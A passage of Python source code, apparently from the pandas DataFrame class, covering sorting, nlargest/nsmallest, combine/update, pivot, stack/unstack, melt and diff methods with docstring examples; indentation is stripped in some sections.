                                                stacklevel=stacklevel)
            if isinstance(ascending, (tuple, list)):
                ascending = ascending[0]
            indexer = nargsort(k, kind=kind, ascending=ascending,
                               na_position=na_position)
        # apply the positional indexer on the block manager
        new_data = self._data.take(indexer,
                                   axis=self._get_block_manager_axis(axis),
                                   verify=False)
        if inplace:
            return self._update_inplace(new_data)
        else:
            return self._constructor(new_data).__finalize__(self)
    @Appender(_shared_docs['sort_index'] % _shared_doc_kwargs)
    def sort_index(self, axis=0, level=None, ascending=True, inplace=False,
                   kind='quicksort', na_position='last', sort_remaining=True,
                   by=None):
        # TODO: this can be combined with Series.sort_index impl as
        # almost identical
        inplace = validate_bool_kwarg(inplace, 'inplace')
        # 10726
        if by is not None:
            # deprecated alias for sort_values
            warnings.warn("by argument to sort_index is deprecated, "
                          "please use .sort_values(by=...)",
                          FutureWarning, stacklevel=2)
            if level is not None:
                raise ValueError("unable to simultaneously sort by and level")
            return self.sort_values(by, axis=axis, ascending=ascending,
                                    inplace=inplace)
        axis = self._get_axis_number(axis)
        labels = self._get_axis(axis)
        if level:
            # sort by one (or more) specific index level(s)
            new_axis, indexer = labels.sortlevel(level, ascending=ascending,
                                                 sort_remaining=sort_remaining)
        elif isinstance(labels, MultiIndex):
            from pandas.core.sorting import lexsort_indexer
            # make sure that the axis is lexsorted to start
            # if not we need to reconstruct to get the correct indexer
            labels = labels._sort_levels_monotonic()
            indexer = lexsort_indexer(labels._get_labels_for_sorting(),
                                      orders=ascending,
                                      na_position=na_position)
        else:
            from pandas.core.sorting import nargsort
            # Check monotonic-ness before sort an index
            # GH11080
            if ((ascending and labels.is_monotonic_increasing) or
                    (not ascending and labels.is_monotonic_decreasing)):
                # already sorted: short-circuit without moving data
                if inplace:
                    return
                else:
                    return self.copy()
            indexer = nargsort(labels, kind=kind, ascending=ascending,
                               na_position=na_position)
        baxis = self._get_block_manager_axis(axis)
        new_data = self._data.take(indexer,
                                   axis=baxis,
                                   verify=False)
        # reconstruct axis if needed
        new_data.axes[baxis] = new_data.axes[baxis]._sort_levels_monotonic()
        if inplace:
            return self._update_inplace(new_data)
        else:
            return self._constructor(new_data).__finalize__(self)
def sortlevel(self, level=0, axis=0, ascending=True, inplace=False,
sort_remaining=True):
"""Sort multilevel index by chosen axis and primary level. Data will be
lexicographically sorted by the chosen level followed by the other
levels (in order).
.. deprecated:: 0.20.0
Use :meth:`DataFrame.sort_index`
Parameters
----------
level : int
axis : {0 or 'index', 1 or 'columns'}, default 0
ascending : boolean, default True
inplace : boolean, default False
Sort the DataFrame without creating a new instance
sort_remaining : boolean, default True
Sort by the other levels too.
Returns
-------
sorted : DataFrame
See Also
--------
DataFrame.sort_index(level=...)
"""
warnings.warn("sortlevel is deprecated, use sort_index(level= ...)",
FutureWarning, stacklevel=2)
return self.sort_index(level=level, axis=axis, ascending=ascending,
inplace=inplace, sort_remaining=sort_remaining)
def nlargest(self, n, columns, keep='first'):
"""
Return the first `n` rows ordered by `columns` in descending order.
Return the first `n` rows with the largest values in `columns`, in
descending order. The columns that are not specified are returned as
well, but not used for ordering.
This method is equivalent to
``df.sort_values(columns, ascending=False).head(n)``, but more
performant.
Parameters
----------
n : int
Number of rows to return.
columns : label or list of labels
Column label(s) to order by.
keep : {'first', 'last'}, default 'first'
Where there are duplicate values:
- `first` : prioritize the first occurrence(s)
- `last` : prioritize the last occurrence(s)
Returns
-------
DataFrame
The first `n` rows ordered by the given columns in descending
order.
See Also
--------
DataFrame.nsmallest : Return the first `n` rows ordered by `columns` in
ascending order.
DataFrame.sort_values : Sort DataFrame by the values
DataFrame.head : Return the first `n` rows without re-ordering.
Notes
-----
This function cannot be used with all column types. For example, when
specifying columns with `object` or `category` dtypes, ``TypeError`` is
raised.
Examples
--------
>>> df = pd.DataFrame({'a': [1, 10, 8, 10, -1],
... 'b': list('abdce'),
... 'c': [1.0, 2.0, np.nan, 3.0, 4.0]})
>>> df
a b c
0 1 a 1.0
1 10 b 2.0
2 8 d NaN
3 10 c 3.0
4 -1 e 4.0
In the following example, we will use ``nlargest`` to select the three
rows having the largest values in column "a".
>>> df.nlargest(3, 'a')
a b c
1 10 b 2.0
3 10 c 3.0
2 8 d NaN
When using ``keep='last'``, ties are resolved in reverse order:
>>> df.nlargest(3, 'a', keep='last')
a b c
3 10 c 3.0
1 10 b 2.0
2 8 d NaN
To order by the largest values in column "a" and then "c", we can
specify multiple columns like in the next example.
>>> df.nlargest(3, ['a', 'c'])
a b c
3 10 c 3.0
1 10 b 2.0
2 8 d NaN
Attempting to use ``nlargest`` on non-numeric dtypes will raise a
``TypeError``:
>>> df.nlargest(3, 'b')
Traceback (most recent call last):
TypeError: Column 'b' has dtype object, cannot use method 'nlargest'
"""
return algorithms.SelectNFrame(self,
n=n,
keep=keep,
columns=columns).nlargest()
def nsmallest(self, n, columns, keep='first'):
"""Get the rows of a DataFrame sorted by the `n` smallest
values of `columns`.
Parameters
----------
n : int
Number of items to retrieve
columns : list or str
Column name or names to order by
keep : {'first', 'last'}, default 'first'
Where there are duplicate values:
- ``first`` : take the first occurrence.
- ``last`` : take the last occurrence.
Returns
-------
DataFrame
Examples
--------
>>> df = pd.DataFrame({'a': [1, 10, 8, 11, -1],
... 'b': list('abdce'),
... 'c': [1.0, 2.0, np.nan, 3.0, 4.0]})
>>> df.nsmallest(3, 'a')
a b c
4 -1 e 4
0 1 a 1
2 8 d NaN
"""
return algorithms.SelectNFrame(self,
n=n,
keep=keep,
columns=columns).nsmallest()
def swaplevel(self, i=-2, j=-1, axis=0):
"""
Swap levels i and j in a MultiIndex on a particular axis
Parameters
----------
i, j : int, string (can be mixed)
Level of index to be swapped. Can pass level name as string.
Returns
-------
swapped : type of caller (new object)
.. versionchanged:: 0.18.1
The indexes ``i`` and ``j`` are now optional, and default to
the two innermost levels of the index.
"""
result = self.copy()
axis = self._get_axis_number(axis)
if axis == 0:
result.index = result.index.swaplevel(i, j)
else:
result.columns = result.columns.swaplevel(i, j)
return result
def reorder_levels(self, order, axis=0):
"""
Rearrange index levels using input order.
May not drop or duplicate levels
Parameters
----------
order : list of int or list of str
List representing new level order. Reference level by number
(position) or by key (label).
axis : int
Where to reorder levels.
Returns
-------
type of caller (new object)
"""
axis = self._get_axis_number(axis)
if not isinstance(self._get_axis(axis),
MultiIndex): # pragma: no cover
raise TypeError('Can only reorder levels on a hierarchical axis.')
result = self.copy()
if axis == 0:
result.index = result.index.reorder_levels(order)
else:
result.columns = result.columns.reorder_levels(order)
return result
# ----------------------------------------------------------------------
# Arithmetic / combination related
    def _combine_frame(self, other, func, fill_value=None, level=None):
        # Align both frames on the union of their labels, then apply `func`
        # either column-by-column (mixed dtypes) or on the raw 2-D values.
        this, other = self.align(other, join='outer', level=level, copy=False)
        new_index, new_columns = this.index, this.columns
        def _arith_op(left, right):
            # for the mixed_type case where we iterate over columns,
            # _arith_op(left, right) is equivalent to
            # left._binop(right, func, fill_value=fill_value)
            left, right = ops.fill_binop(left, right, fill_value)
            return func(left, right)
        if this._is_mixed_type or other._is_mixed_type:
            # iterate over columns
            if this.columns.is_unique:
                # unique columns
                result = {col: _arith_op(this[col], other[col])
                          for col in this}
                result = self._constructor(result, index=new_index,
                                           columns=new_columns, copy=False)
            else:
                # non-unique columns: fall back to positional access
                result = {i: _arith_op(this.iloc[:, i], other.iloc[:, i])
                          for i, col in enumerate(this.columns)}
                result = self._constructor(result, index=new_index, copy=False)
                result.columns = new_columns
            return result
        else:
            # homogeneous dtype: operate on the full ndarray at once
            result = _arith_op(this.values, other.values)
        return self._constructor(result, index=new_index, columns=new_columns,
                                 copy=False)
def _combine_match_index(self, other, func, level=None):
left, right = self.align(other, join='outer', axis=0, level=level,
copy=False)
new_data = func(left.values.T, right.values).T
return self._constructor(new_data,
index=left.index, columns=self.columns,
copy=False)
def _combine_match_columns(self, other, func, level=None, try_cast=True):
left, right = self.align(other, join='outer', axis=1, level=level,
copy=False)
new_data = left._data.eval(func=func, other=right,
axes=[left.columns, self.index],
try_cast=try_cast)
return self._constructor(new_data)
def _combine_const(self, other, func, errors='raise', try_cast=True):
new_data = self._data.eval(func=func, other=other,
errors=errors,
try_cast=try_cast)
return self._constructor(new_data)
    def _compare_frame(self, other, func, str_rep):
        # compare_frame assumes self._indexed_same(other)
        import pandas.core.computation.expressions as expressions
        # unique
        if self.columns.is_unique:
            def _compare(a, b):
                # compare column-by-column via label access
                return {col: func(a[col], b[col]) for col in a.columns}
            new_data = expressions.evaluate(_compare, str_rep, self, other)
            return self._constructor(data=new_data, index=self.index,
                                     columns=self.columns, copy=False)
        # non-unique
        else:
            def _compare(a, b):
                # duplicate labels: fall back to positional access
                return {i: func(a.iloc[:, i], b.iloc[:, i])
                        for i, col in enumerate(a.columns)}
            new_data = expressions.evaluate(_compare, str_rep, self, other)
            result = self._constructor(data=new_data, index=self.index,
                                       copy=False)
            result.columns = self.columns
            return result
    def combine(self, other, func, fill_value=None, overwrite=True):
        """
        Add two DataFrame objects and do not propagate NaN values, so if for a
        (column, time) one frame is missing a value, it will default to the
        other frame's value (which might be NaN as well)
        Parameters
        ----------
        other : DataFrame
        func : function
            Function that takes two series as inputs and return a Series or a
            scalar
        fill_value : scalar value
        overwrite : boolean, default True
            If True then overwrite values for common keys in the calling frame
        Returns
        -------
        result : DataFrame
        Examples
        --------
        >>> df1 = DataFrame({'A': [0, 0], 'B': [4, 4]})
        >>> df2 = DataFrame({'A': [1, 1], 'B': [3, 3]})
        >>> df1.combine(df2, lambda s1, s2: s1 if s1.sum() < s2.sum() else s2)
           A  B
        0  0  3
        1  0  3
        See Also
        --------
        DataFrame.combine_first : Combine two DataFrame objects and default to
            non-null values in frame calling the method
        """
        other_idxlen = len(other.index)  # save for compare
        this, other = self.align(other, copy=False)
        new_index = this.index
        # short-circuit when one side contributes nothing after alignment
        if other.empty and len(new_index) == len(self.index):
            return self.copy()
        if self.empty and len(other) == other_idxlen:
            return other.copy()
        # sorts if possible
        new_columns = this.columns.union(other.columns)
        do_fill = fill_value is not None
        result = {}
        for col in new_columns:
            series = this[col]
            otherSeries = other[col]
            this_dtype = series.dtype
            other_dtype = otherSeries.dtype
            this_mask = isna(series)
            other_mask = isna(otherSeries)
            # don't overwrite columns unecessarily
            # DO propagate if this column is not in the intersection
            if not overwrite and other_mask.all():
                result[col] = this[col].copy()
                continue
            if do_fill:
                series = series.copy()
                otherSeries = otherSeries.copy()
                series[this_mask] = fill_value
                otherSeries[other_mask] = fill_value
            # if we have different dtypes, possibly promote
            new_dtype = this_dtype
            if not is_dtype_equal(this_dtype, other_dtype):
                new_dtype = find_common_type([this_dtype, other_dtype])
                if not is_dtype_equal(this_dtype, new_dtype):
                    series = series.astype(new_dtype)
                if not is_dtype_equal(other_dtype, new_dtype):
                    otherSeries = otherSeries.astype(new_dtype)
            # see if we need to be represented as i8 (datetimelike)
            # try to keep us at this dtype
            needs_i8_conversion_i = needs_i8_conversion(new_dtype)
            if needs_i8_conversion_i:
                arr = func(series, otherSeries, True)
            else:
                arr = func(series, otherSeries)
            if do_fill:
                # positions missing on BOTH sides stay NaN despite fill_value
                arr = _ensure_float(arr)
                arr[this_mask & other_mask] = np.nan
            # try to downcast back to the original dtype
            if needs_i8_conversion_i:
                # ToDo: This conversion should be handled in
                # _maybe_cast_to_datetime but the change affects lot...
                if is_datetime64tz_dtype(new_dtype):
                    arr = DatetimeIndex._simple_new(arr, tz=new_dtype.tz)
                else:
                    arr = maybe_cast_to_datetime(arr, new_dtype)
            else:
                arr = maybe_downcast_to_dtype(arr, this_dtype)
            result[col] = arr
        # convert_objects just in case
        return self._constructor(result, index=new_index,
                                 columns=new_columns)._convert(datetime=True,
                                                               copy=False)
    def combine_first(self, other):
        """
        Combine two DataFrame objects and default to non-null values in frame
        calling the method. Result index columns will be the union of the
        respective indexes and columns
        Parameters
        ----------
        other : DataFrame
        Returns
        -------
        combined : DataFrame
        Examples
        --------
        df1's values prioritized, use values from df2 to fill holes:
        >>> df1 = pd.DataFrame([[1, np.nan]])
        >>> df2 = pd.DataFrame([[3, 4]])
        >>> df1.combine_first(df2)
           0    1
        0  1  4.0
        See Also
        --------
        DataFrame.combine : Perform series-wise operation on two DataFrames
            using a given function
        """
        import pandas.core.computation.expressions as expressions
        def combiner(x, y, needs_i8_conversion=False):
            # prefer x's values; substitute y's where x is missing
            x_values = x.values if hasattr(x, 'values') else x
            y_values = y.values if hasattr(y, 'values') else y
            if needs_i8_conversion:
                # datetimelike: mask from the original, combine on i8 views
                mask = isna(x)
                x_values = x_values.view('i8')
                y_values = y_values.view('i8')
            else:
                mask = isna(x_values)
            return expressions.where(mask, y_values, x_values)
        # combine() with overwrite=False keeps self's non-NA values intact
        return self.combine(other, combiner, overwrite=False)
def update(self, other, join='left', overwrite=True, filter_func=None,
raise_conflict=False):
"""
Modify in place using non-NA values from another DataFrame.
Aligns on indices. There is no return value.
Parameters
----------
other : DataFrame, or object coercible into a DataFrame
Should have at least one matching index/column label
with the original DataFrame. If a Series is passed,
its name attribute must be set, and that will be
used as the column name to align with the original DataFrame.
join : {'left'}, default 'left'
Only left join is implemented, keeping the index and columns of the
original object.
overwrite : bool, default True
How to handle non-NA values for overlapping keys:
* True: overwrite original DataFrame's values
with values from `other`.
* False: only update values that are NA in
the original DataFrame.
filter_func : callable(1d-array) -> boolean 1d-array, optional
Can choose to replace values other than NA. Return True for values
that should be updated.
raise_conflict : bool, default False
If True, will raise a ValueError if the DataFrame and `other`
both contain non-NA data in the same place.
Raises
------
ValueError
When `raise_conflict` is True and there's overlapping non-NA data.
See Also
--------
dict.update : Similar method for dictionaries.
DataFrame.merge : For column(s)-on-columns(s) operations.
Examples
--------
>>> df = pd.DataFrame({'A': [1, 2, 3],
... 'B': [400, 500, 600]})
>>> new_df = pd.DataFrame({'B': [4, 5, 6],
... 'C': [7, 8, 9]})
>>> df.update(new_df)
>>> df
A B
0 1 4
1 2 5
2 3 6
The DataFrame's length does not increase as a result of the update,
only values at matching index/column labels are updated.
>>> df = pd.DataFrame({'A': ['a', 'b', 'c'],
... 'B': ['x', 'y', 'z']})
>>> new_df = pd.DataFrame({'B': ['d', 'e', 'f', 'g', 'h', 'i']})
>>> df.update(new_df)
>>> df
A B
0 a d
1 b e
2 c f
For Series, it's name attribute must be set.
>>> df = pd.DataFrame({'A': ['a', 'b', 'c'],
... 'B': ['x', 'y', 'z']})
>>> new_column = pd.Series(['d', 'e'], name='B', index=[0, 2])
>>> df.update(new_column)
>>> df
A B
0 a d
1 b y
2 c e
>>> df = pd.DataFrame({'A': ['a', 'b', 'c'],
... 'B': ['x', 'y', 'z']})
>>> new_df = pd.DataFrame({'B': ['d', 'e']}, index=[1, 2])
>>> df.update(new_df)
>>> df
A B
0 a x
1 b d
2 c e
If `other` contains NaNs the corresponding values are not updated
in the original dataframe.
>>> df = pd.DataFrame({'A': [1, 2, 3],
... 'B': [400, 500, 600]})
>>> new_df = pd.DataFrame({'B': [4, np.nan, 6]})
>>> df.update(new_df)
>>> df
A B
0 1 4.0
1 2 500.0
2 3 6.0
"""
import pandas.core.computation.expressions as expressions
# TODO: Support other joins
if join != 'left': # pragma: no cover
raise NotImplementedError("Only left join is supported")
if not isinstance(other, DataFrame):
other = DataFrame(other)
other = other.reindex_like(self)
for col in self.columns:
this = self[col].values
that = other[col].values
if filter_func is not None:
with np.errstate(all='ignore'):
mask = ~filter_func(this) | isna(that)
else:
if raise_conflict:
mask_this = notna(that)
mask_that = notna(this)
if any(mask_this & mask_that):
raise ValueError("Data overlaps.")
if overwrite:
mask = isna(that)
else:
mask = notna(this)
# don't overwrite columns unecessarily
if mask.all():
continue
self[col] = expressions.where(mask, this, that)
# ----------------------------------------------------------------------
# Misc methods
def _get_valid_indices(self):
is_valid = self.count(1) > 0
return self.index[is_valid]
@Appender(_shared_docs['valid_index'] % {
'position': 'first', 'klass': 'DataFrame'})
def first_valid_index(self):
if len(self) == 0:
return None
valid_indices = self._get_valid_indices()
return valid_indices[0] if len(valid_indices) else None
@Appender(_shared_docs['valid_index'] % {
'position': 'last', 'klass': 'DataFrame'})
def last_valid_index(self):
if len(self) == 0:
return None
valid_indices = self._get_valid_indices()
return valid_indices[-1] if len(valid_indices) else None
# ----------------------------------------------------------------------
# Data reshaping
def pivot(self, index=None, columns=None, values=None):
"""
Return reshaped DataFrame organized by given index / column values.
Reshape data (produce a "pivot" table) based on column values. Uses
unique values from specified `index` / `columns` to form axes of the
resulting DataFrame. This function does not support data
aggregation, multiple values will result in a MultiIndex in the
columns. See the :ref:`User Guide <reshaping>` for more on reshaping.
Parameters
----------
index : string or object, optional
Column to use to make new frame's index. If None, uses
existing index.
columns : string or object
Column to use to make new frame's columns.
values : string, object or a list of the previous, optional
Column(s) to use for populating new frame's values. If not
specified, all remaining columns will be used and the result will
have hierarchically indexed columns.
.. versionchanged :: 0.23.0
Also accept list of column names.
Returns
-------
DataFrame
Returns reshaped DataFrame.
Raises
------
ValueError:
When there are any `index`, `columns` combinations with multiple
values. `DataFrame.pivot_table` when you need to aggregate.
See Also
--------
DataFrame.pivot_table : generalization of pivot that can handle
duplicate values for one index/column pair.
DataFrame.unstack : pivot based on the index values instead of a
column.
Notes
-----
For finer-tuned control, see hierarchical indexing documentation along
with the related stack/unstack methods.
Examples
--------
>>> df = pd.DataFrame({'foo': ['one', 'one', 'one', 'two', 'two',
... 'two'],
... 'bar': ['A', 'B', 'C', 'A', 'B', 'C'],
... 'baz': [1, 2, 3, 4, 5, 6],
... 'zoo': ['x', 'y', 'z', 'q', 'w', 't']})
>>> df
foo bar baz zoo
0 one A 1 x
1 one B 2 y
2 one C 3 z
3 two A 4 q
4 two B 5 w
5 two C 6 t
>>> df.pivot(index='foo', columns='bar', values='baz')
bar A B C
foo
one 1 2 3
two 4 5 6
>>> df.pivot(index='foo', columns='bar')['baz']
bar A B C
foo
one 1 2 3
two 4 5 6
>>> df.pivot(index='foo', columns='bar', values=['baz', 'zoo'])
baz zoo
bar A B C A B C
foo
one 1 2 3 x y z
two 4 5 6 q w t
A ValueError is raised if there are any duplicates.
>>> df = pd.DataFrame({"foo": ['one', 'one', 'two', 'two'],
... "bar": ['A', 'A', 'B', 'C'],
... "baz": [1, 2, 3, 4]})
>>> df
foo bar baz
0 one A 1
1 one A 2
2 two B 3
3 two C 4
Notice that the first two rows are the same for our `index`
and `columns` arguments.
>>> df.pivot(index='foo', columns='bar', values='baz')
Traceback (most recent call last):
...
ValueError: Index contains duplicate entries, cannot reshape
"""
from pandas.core.reshape.reshape import pivot
return pivot(self, index=index, columns=columns, values=values)
_shared_docs['pivot_table'] = """
Create a spreadsheet-style pivot table as a DataFrame. The levels in
the pivot table will be stored in MultiIndex objects (hierarchical
indexes) on the index and columns of the result DataFrame
Parameters
----------%s
values : column to aggregate, optional
index : column, Grouper, array, or list of the previous
If an array is passed, it must be the same length as the data. The
list can contain any of the other types (except list).
Keys to group by on the pivot table index. If an array is passed,
it is being used as the same manner as column values.
columns : column, Grouper, array, or list of the previous
If an array is passed, it must be the same length as the data. The
list can contain any of the other types (except list).
Keys to group by on the pivot table column. If an array is passed,
it is being used as the same manner as column values.
aggfunc : function, list of functions, dict, default numpy.mean
If list of functions passed, the resulting pivot table will have
hierarchical columns whose top level are the function names
(inferred from the function objects themselves)
If dict is passed, the key is column to aggregate and value
is function or list of functions
fill_value : scalar, default None
Value to replace missing values with
margins : boolean, default False
Add all row / columns (e.g. for subtotal / grand totals)
dropna : boolean, default True
Do not include columns whose entries are all NaN
margins_name : string, default 'All'
Name of the row / column that will contain the totals
when margins is True.
Examples
--------
>>> df = pd.DataFrame({"A": ["foo", "foo", "foo", "foo", "foo",
... "bar", "bar", "bar", "bar"],
... "B": ["one", "one", "one", "two", "two",
... "one", "one", "two", "two"],
... "C": ["small", "large", "large", "small",
... "small", "large", "small", "small",
... "large"],
... "D": [1, 2, 2, 3, 3, 4, 5, 6, 7]})
>>> df
A B C D
0 foo one small 1
1 foo one large 2
2 foo one large 2
3 foo two small 3
4 foo two small 3
5 bar one large 4
6 bar one small 5
7 bar two small 6
8 bar two large 7
>>> table = pivot_table(df, values='D', index=['A', 'B'],
... columns=['C'], aggfunc=np.sum)
>>> table
C large small
A B
bar one 4.0 5.0
two 7.0 6.0
foo one 4.0 1.0
two NaN 6.0
>>> table = pivot_table(df, values='D', index=['A', 'B'],
... columns=['C'], aggfunc=np.sum)
>>> table
C large small
A B
bar one 4.0 5.0
two 7.0 6.0
foo one 4.0 1.0
two NaN 6.0
>>> table = pivot_table(df, values=['D', 'E'], index=['A', 'C'],
... aggfunc={'D': np.mean,
... 'E': [min, max, np.mean]})
>>> table
D E
mean max median min
A C
bar large 5.500000 16 14.5 13
small 5.500000 15 14.5 14
foo large 2.000000 10 9.5 9
small 2.333333 12 11.0 8
Returns
-------
table : DataFrame
See also
--------
DataFrame.pivot : pivot without aggregation that can handle
non-numeric data
"""
@Substitution('')
@Appender(_shared_docs['pivot_table'])
def pivot_table(self, values=None, index=None, columns=None,
aggfunc='mean', fill_value=None, margins=False,
dropna=True, margins_name='All'):
from pandas.core.reshape.pivot import pivot_table
return pivot_table(self, values=values, index=index, columns=columns,
aggfunc=aggfunc, fill_value=fill_value,
margins=margins, dropna=dropna,
margins_name=margins_name)
def stack(self, level=-1, dropna=True):
"""
Stack the prescribed level(s) from columns to index.
Return a reshaped DataFrame or Series having a multi-level
index with one or more new inner-most levels compared to the current
DataFrame. The new inner-most levels are created by pivoting the
columns of the current dataframe:
- if the columns have a single level, the output is a Series;
- if the columns have multiple levels, the new index
level(s) is (are) taken from the prescribed level(s) and
the output is a DataFrame.
The new index levels are sorted.
Parameters
----------
level : int, str, list, default -1
Level(s) to stack from the column axis onto the index
axis, defined as one index or label, or a list of indices
or labels.
dropna : bool, default True
Whether to drop rows in the resulting Frame/Series with
missing values. Stacking a column level onto the index
axis can create combinations of index and column values
that are missing from the original dataframe. See Examples
section.
Returns
-------
DataFrame or Series
Stacked dataframe or series.
See Also
--------
DataFrame.unstack : Unstack prescribed level(s) from index axis
onto column axis.
DataFrame.pivot : Reshape dataframe from long format to wide
format.
DataFrame.pivot_table : Create a spreadsheet-style pivot table
as a DataFrame.
Notes
-----
The function is named by analogy with a collection of books
being re-organised from being side by side on a horizontal
position (the columns of the dataframe) to being stacked
vertically on top of of each other (in the index of the
dataframe).
Examples
--------
**Single level columns**
>>> df_single_level_cols = pd.DataFrame([[0, 1], [2, 3]],
... index=['cat', 'dog'],
... columns=['weight', 'height'])
Stacking a dataframe with a single level column axis returns a Series:
>>> df_single_level_cols
weight height
cat 0 1
dog 2 3
>>> df_single_level_cols.stack()
cat weight 0
height 1
dog weight 2
height 3
dtype: int64
**Multi level columns: simple case**
>>> multicol1 = pd.MultiIndex.from_tuples([('weight', 'kg'),
... ('weight', 'pounds')])
>>> df_multi_level_cols1 = pd.DataFrame([[1, 2], [2, 4]],
... index=['cat', 'dog'],
... columns=multicol1)
Stacking a dataframe with a multi-level column axis:
>>> df_multi_level_cols1
weight
kg pounds
cat 1 2
dog 2 4
>>> df_multi_level_cols1.stack()
weight
cat kg 1
pounds 2
dog kg 2
pounds 4
**Missing values**
>>> multicol2 = pd.MultiIndex.from_tuples([('weight', 'kg'),
... ('height', 'm')])
>>> df_multi_level_cols2 = pd.DataFrame([[1.0, 2.0], [3.0, 4.0]],
... index=['cat', 'dog'],
... columns=multicol2)
It is common to have missing values when stacking a dataframe
with multi-level columns, as the stacked dataframe typically
has more values than the original dataframe. Missing values
are filled with NaNs:
>>> df_multi_level_cols2
weight height
kg m
cat 1.0 2.0
dog 3.0 4.0
>>> df_multi_level_cols2.stack()
height weight
cat kg NaN 1.0
m 2.0 NaN
dog kg NaN 3.0
m 4.0 NaN
**Prescribing the level(s) to be stacked**
The first parameter controls which level or levels are stacked:
>>> df_multi_level_cols2.stack(0)
kg m
cat height NaN 2.0
weight 1.0 NaN
dog height NaN 4.0
weight 3.0 NaN
>>> df_multi_level_cols2.stack([0, 1])
cat height m 2.0
weight kg 1.0
dog height m 4.0
weight kg 3.0
dtype: float64
**Dropping missing values**
>>> df_multi_level_cols3 = pd.DataFrame([[None, 1.0], [2.0, 3.0]],
... index=['cat', 'dog'],
... columns=multicol2)
Note that rows where all values are missing are dropped by
default but this behaviour can be controlled via the dropna
keyword parameter:
>>> df_multi_level_cols3
weight height
kg m
cat NaN 1.0
dog 2.0 3.0
>>> df_multi_level_cols3.stack(dropna=False)
height weight
cat kg NaN NaN
m 1.0 NaN
dog kg NaN 2.0
m 3.0 NaN
>>> df_multi_level_cols3.stack(dropna=True)
height weight
cat m 1.0 NaN
dog kg NaN 2.0
m 3.0 NaN
"""
from pandas.core.reshape.reshape import stack, stack_multiple
if isinstance(level, (tuple, list)):
return stack_multiple(self, level, dropna=dropna)
else:
return stack(self, level, dropna=dropna)
def unstack(self, level=-1, fill_value=None):
"""
Pivot a level of the (necessarily hierarchical) index labels, returning
a DataFrame having a new level of column labels whose inner-most level
consists of the pivoted index labels. If the index is not a MultiIndex,
the output will be a Series (the analogue of stack when the columns are
not a MultiIndex).
The level involved will automatically get sorted.
Parameters
----------
level : int, string, or list of these, default -1 (last level)
Level(s) of index to unstack, can pass level name
fill_value : replace NaN with this value if the unstack produces
missing values
.. versionadded:: 0.18.0
See also
--------
DataFrame.pivot : Pivot a table based on column values.
DataFrame.stack : Pivot a level of the column labels (inverse operation
from `unstack`).
Examples
--------
>>> index = pd.MultiIndex.from_tuples([('one', 'a'), ('one', 'b'),
... ('two', 'a'), ('two', 'b')])
>>> s = pd.Series(np.arange(1.0, 5.0), index=index)
>>> s
one a 1.0
b 2.0
two a 3.0
b 4.0
dtype: float64
>>> s.unstack(level=-1)
a b
one 1.0 2.0
two 3.0 4.0
>>> s.unstack(level=0)
one two
a 1.0 3.0
b 2.0 4.0
>>> df = s.unstack(level=0)
>>> df.unstack()
one a 1.0
b 2.0
two a 3.0
b 4.0
dtype: float64
Returns
-------
unstacked : DataFrame or Series
"""
from pandas.core.reshape.reshape import unstack
return unstack(self, level, fill_value)
_shared_docs['melt'] = ("""
"Unpivots" a DataFrame from wide format to long format, optionally
leaving identifier variables set.
This function is useful to massage a DataFrame into a format where one
or more columns are identifier variables (`id_vars`), while all other
columns, considered measured variables (`value_vars`), are "unpivoted" to
the row axis, leaving just two non-identifier columns, 'variable' and
'value'.
%(versionadded)s
Parameters
----------
frame : DataFrame
id_vars : tuple, list, or ndarray, optional
Column(s) to use as identifier variables.
value_vars : tuple, list, or ndarray, optional
Column(s) to unpivot. If not specified, uses all columns that
are not set as `id_vars`.
var_name : scalar
Name to use for the 'variable' column. If None it uses
``frame.columns.name`` or 'variable'.
value_name : scalar, default 'value'
Name to use for the 'value' column.
col_level : int or string, optional
If columns are a MultiIndex then use this level to melt.
See also
--------
%(other)s
pivot_table
DataFrame.pivot
Examples
--------
>>> import pandas as pd
>>> df = pd.DataFrame({'A': {0: 'a', 1: 'b', 2: 'c'},
... 'B': {0: 1, 1: 3, 2: 5},
... 'C': {0: 2, 1: 4, 2: 6}})
>>> df
A B C
0 a 1 2
1 b 3 4
2 c 5 6
>>> %(caller)sid_vars=['A'], value_vars=['B'])
A variable value
0 a B 1
1 b B 3
2 c B 5
>>> %(caller)sid_vars=['A'], value_vars=['B', 'C'])
A variable value
0 a B 1
1 b B 3
2 c B 5
3 a C 2
4 b C 4
5 c C 6
The names of 'variable' and 'value' columns can be customized:
>>> %(caller)sid_vars=['A'], value_vars=['B'],
... var_name='myVarname', value_name='myValname')
A myVarname myValname
0 a B 1
1 b B 3
2 c B 5
If you have multi-index columns:
>>> df.columns = [list('ABC'), list('DEF')]
>>> df
A B C
D E F
0 a 1 2
1 b 3 4
2 c 5 6
>>> %(caller)scol_level=0, id_vars=['A'], value_vars=['B'])
A variable value
0 a B 1
1 b B 3
2 c B 5
>>> %(caller)sid_vars=[('A', 'D')], value_vars=[('B', 'E')])
(A, D) variable_0 variable_1 value
0 a B E 1
1 b B E 3
2 c B E 5
""")
@Appender(_shared_docs['melt'] %
dict(caller='df.melt(',
versionadded='.. versionadded:: 0.20.0\n',
other='melt'))
def melt(self, id_vars=None, value_vars=None, var_name=None,
value_name='value', col_level=None):
from pandas.core.reshape.melt import melt
return melt(self, id_vars=id_vars, value_vars=value_vars,
var_name=var_name, value_name=value_name,
col_level=col_level)
# ----------------------------------------------------------------------
# Time series-related
def diff(self, periods=1, axis=0):
"""
First discrete difference of element.
Calculates the difference of a DataFrame element compared with another
element in the DataFrame (default is the element in the same column
of the previous row).
Parameters
----------
periods : int, default 1
Periods to shift for calculating difference, accepts negative
values.
axis : {0 or 'index', 1 or 'columns'}, default 0
Take difference over rows (0) or columns (1).
.. versionadded:: 0.16.1.
Returns
-------
diffed : DataFrame
See Also
--------
Series.diff: First discrete difference for a Series.
DataFrame.pct_change: Percent change over given number of periods.
DataFrame.shift: Shift index by desired number of periods with an
optional time freq.
Examples
--------
Difference with previous row
>>> df = pd.DataFrame({'a': [1, 2, 3, 4, 5, 6],
... 'b': [1, 1, 2, 3, 5, 8],
... 'c': [1, 4, 9, 16, 25, 36]})
>>> df
a b c
0 1 1 1
1 2 1 4
2 3 2 9
3 4 3 16
4 5 5 25
5 6 8 36
>>> df.diff()
a b c
0 NaN NaN NaN
1 1.0 0.0 3.0
2 1.0 1.0 5.0
3 1.0 1.0 7.0
4 1.0 2.0 9.0
5 1.0 3.0 11.0
Difference with previous column
>>> df.diff(axis=1)
a b c
0 NaN 0.0 0.0
1 NaN -1.0 3.0
2 NaN -1.0 7.0
3 NaN -1.0 13.0
4 NaN 0.0 20.0
5 NaN 2.0 28.0
Difference with 3rd previous row
>>> df.diff(periods=3)
a b c
0 NaN NaN NaN
